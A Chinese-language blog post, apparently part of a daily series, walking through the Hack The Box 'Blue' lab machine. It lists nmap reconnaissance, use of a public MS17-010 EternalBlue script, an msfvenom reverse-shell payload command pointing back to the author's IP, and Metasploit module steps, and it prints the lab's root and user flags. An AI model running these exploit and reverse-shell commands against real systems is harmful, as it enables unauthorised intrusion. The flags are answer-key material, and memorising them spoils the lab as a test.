[Day22] HTB Blue

Recon

  • Rustscan
  • nmap
    • nmap -A -p 135,139,445,49152,49153,49154,49155,49156,49157 10.129.209.90
    • 系统版本
      • Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
  • smb
  • nmapAutomator

Exploit

  • https://github.com/helviojunior/MS17-010
    • 修改 send_and_execute.py 里面的 username
      • 等於 guest
  • MSF 准备 shell
    • msfvenom -p windows/x64/shell_reverse_tcp LHOST=10.10.16.35 LPORT=7877 -f exe -o shellx64.exe
      • 其实这边用 x86 也可以
  • 执行 Exploit
    • python send_and_execute.py 10.129.216.62 ../shellx64.exe
  • nc 收 shell
  • 理论上这样就结束ㄌ
    • 但觉得今天这样有一点太水 QQ,我们试用 msf 看看ㄅ

MSF Exploit

  • msfconsole
  • use windows/smb/ms17_010_eternalblue
  • options
  • set RHOSTS 10.129.216.62
  • set LHOST 10.10.16.35
  • run
  • Get Root Key
    • ff548eb71e920ff6c08843ce9df4e717
  • Get User Key
    • 4c546aea7dbee75cbd71de245c8deea9

<<:  下有对策 - CORS

>>:  [Day22] Deployment Manager

JavaScript Day 3. 变数:布林、undefined、null

开始学习 JavaScript 之後遇到的变数五花八门,不理解用法或是不懂的回传的型态,就很容易会卡...

[Day23] 网格交易机器人-下单/取消下单/抓取库存

首先bidask那边少一个release,已经做修正 首先先用list_positions抓取手上的...

[DAY10] 用 Automated ML 快速开发

DAY10 用 Automated ML 快速开发 今天我们来体验一下 AML 的 Automate...

D29-(9/29)-广达(2382)-有肉松之称的电脑代工厂

注:发文日和截图的日期不一定是同一天,所以价格计算上和当日不同,是很正常的。 声明:这一系列文章并无...

Average pair

两数相加平均数 必须是被排序好的 应用在找寻有哪些配对符合所要的数值 接下来让我们实作吧!!! 回圈...